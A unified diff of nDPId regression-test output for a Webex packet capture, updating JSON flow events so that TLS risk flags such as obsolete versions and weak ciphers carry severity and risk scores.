-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00989{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628113,"flow_last_seen":1444570628113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570628113,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1444570628113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570628113,"pkt":"ABoRAAACABoRAAABCABFAAA8CqVAAEAGfGMKCAABQERpZ6GGAbuTEbVkAAAAAKACOQivfwAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1444570628117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAAoATVAABAGtedARGlnCggAAQG7oYZs7kqbkxG1ZVAS\/\/9Y3AAA"}
@@ -18,11 +18,11 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1444570628117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAA8SvxAAEAGPAwKCAABQERpZ6GHAbtcKPU9AAAAAKACOQimjgAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoATZAABAGteZARGlnCggAAQG7oYej1wrCXCj1PlAS\/\/9Y2wAA"}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoCqZAAEAGfHYKCAABQERpZ6GGAbuTEbVlbO5KnFAQOQgf1QAA"}
-00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1444570628122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570628122,"pkt":"ABoRAAACABoRAAABCABFAAAoSv1AAEAGPB8KCAABQERpZ6GHAbtcKPU+o9cKw1AQOQgf1AAA"}
-00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00884{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
-00884{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1444570630272,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAA0ymtAAEAGS1oKhc4vuT+TCtV7Abs2TX647AAfvYARAZp5QwAAAQEICgBMwJ1XHSbf"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWBAABAGRHK5P5MKCoXOLwG71XvsAB+9Nk1+uVAQ\/\/\/y2gAA"}
@@ -35,20 +35,20 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1444570631722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570631722,"pkt":"ABoRAAACABoRAAABCABFAAA87rhAAEAGmE8KCAABQERpZ6GKAbt6Ji+WAAAAAKACOQhMyAAAAgQFtAQCCAoATMEuAAAAAAEDAwY="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1444570631726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAoAWZAABAGtbZARGlnCggAAQG7oYqF2dBpeiYvl1AS\/\/9Y2AAA"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1444570631726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAo7rlAAEAGmGIKCAABQERpZ6GKAbt6Ji+XhdnQalAQOQgf0QAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570632436,"flow_last_seen":1444570632436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570632436,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1444570632436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570632436,"pkt":"ABoRAAACABoRAAABCABFAAA8E6FAAEAGB\/MKCAABFyz987+YAbs3etLXAAAAAKACOQhiaAAAAgQFtAQCCAoATMF2AAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1444570632439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570632439,"pkt":"ABoRAAACABoRAAABCABFAAAoAWtAABAGSj0XLP3zCggAAQG7v5jIhS0oN3rS2FAS\/\/\/PVQAA"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1444570632470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570632470,"pkt":"ABoRAAACABoRAAABCABFAAAoE6JAAEAGCAYKCAABFyz987+YAbs3etLYyIUtKVAQOQiWTgAA"}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01668{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}}
+00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
